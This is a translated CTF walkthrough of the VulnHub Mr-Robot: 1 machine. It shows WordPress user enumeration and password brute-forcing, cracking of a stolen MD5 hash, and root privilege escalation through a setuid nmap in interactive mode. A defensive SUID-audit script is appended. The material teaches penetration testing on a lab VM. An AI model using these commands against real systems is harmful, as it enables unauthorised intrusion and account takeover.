
VulnHub: Immerse yourself in hacking in the style of the TV series Mr. Robot





I think many people have watched the TV series Mr. Robot; with each season more and more people discover it, and VulnHub has not stood aside: not long ago a Boot2Root virtual machine, Mr-Robot: 1, appeared there. Today we will walk through its solution.



There will be no reverse engineering here, but there will be several examples demonstrating how incorrectly assigned permissions on critical files can get your system hacked. So let's begin: the goal is to obtain 3 keys.


Key 1



We start by getting the list of open ports, using the approach already familiar from earlier articles:



$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV

80/tcp  open  http      Apache httpd
443/tcp open  ssl/http  Apache httpd



Next, we launch robotscan, which we have already used in one of the previous articles:



$ ./robotscan.py -u 'http://192.168.1.29' -e txt,php -w /usr/share/dirb/wordlists/big.txt -x 403






First key:



$ curl http://192.168.1.29/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9


Key 2



As you may have noticed, there is one more file that is not typical for WordPress: fsocity.dic. It turns out to be a ready-made wordlist for brute-forcing. All that remains is to remove the duplicates from it:



 $ sort -u fsocity.dic > fsocity_sort.dic 


WPScan refused to enumerate the existing users, so we have to do it another way.

PS: WPScan checks URLs of the form target_url/?author=$id

Meanwhile, by default the wp-login.php login script returns “Invalid username” when the user does not exist, and “The password you entered for the username $username is incorrect” when it does:


$ sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.29%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username'


And after a while we get the result:

22:28:26 patator INFO - 200 4093:3643 0.262 | Elliot | 5474 | HTTP/1.1 200 OK

22:28:26 patator INFO - 200 4093:3643 0.276 | elliot | 5473 | HTTP/1.1 200 OK

22:28:27 patator INFO - 200 4093:3643 0.235 | ELLIOT | 5475 | HTTP/1.1 200 OK


We have the login; it remains to find the password. We use the same file as the wordlist:



$ sudo ./wpscan.rb --url 192.168.1.29 --threads 50 --wordlist ./fsocity_sort.dic --username elliot






We get ourselves a shell through Metasploit:







First we examine the contents of the directory containing the users' home folders:







The key is here, but the robot user's credentials are needed. Opening the second available file, we find what we need:



$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b


It remains to crack the MD5 hash on the nearest online service: abcdefghijklmnopqrstuvwxyz.



We log in on the virtual machine and get the second key:







Key 3



The third key is probably in the root user's home. Let's look at the available SUID binaries:



$ find / -perm -4000 2>/dev/null






Nothing unusual except nmap. Launching it without parameters, we get the help text, and a potential vulnerability:







As MrRobot would say:

Hacking them was easy: they used an old version of nmap with interactive mode support and incorrectly set permissions, so I easily got root access.


$ nmap --interactive






From interactive mode we launch a command shell with !sh and take the last key:







That's all. Yet another confirmation of how incorrectly assigned permissions lead to the compromise of a system!
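The defender's counterpart to the SUID check used above, as an added example that is not from the original article: audit setuid/setgid files against an allowlist of expected binaries so that an unexpected one, like the setuid nmap on this machine, stands out. The allowlist contents and the script name are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the original article: report setuid/setgid files
# that are not on an allowlist, so a binary like a setuid nmap stands out.
# The ALLOWLIST below is an assumption for illustration; build yours from a
# clean install of your own distribution and keep it under version control.

ALLOWLIST="passwd su sudo mount umount ping newgrp chsh chfn gpasswd"

# is_allowed NAME: succeed if NAME is on the allowlist
is_allowed() {
    for ok in $ALLOWLIST; do
        [ "$1" = "$ok" ] && return 0
    done
    return 1
}

# audit_suid ROOT: print the path of every regular file under ROOT with the
# setuid (-perm -4000) or setgid (-perm -2000) bit set whose basename is not
# allowlisted. Same search as the article's `find / -perm -4000`, with the
# noise of expected binaries removed.
audit_suid() {
    root=${1:-/}
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        is_allowed "$(basename "$path")" || printf '%s\n' "$path"
    done
}

# Stand-alone use: ./suid_audit.sh /   (exit status 1 if anything was flagged)
if [ "$#" -gt 0 ]; then
    flagged=$(audit_suid "$1")
    if [ -n "$flagged" ]; then
        printf 'Unexpected setuid/setgid files:\n%s\n' "$flagged"
        exit 1
    fi
    echo "No unexpected setuid/setgid files under $1"
fi
```

Run it from cron or a configuration-management check and alert on any non-zero exit; a new entry in the output is exactly the change a setuid nmap would have produced here.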

Source: https://habr.com/ru/post/320106/


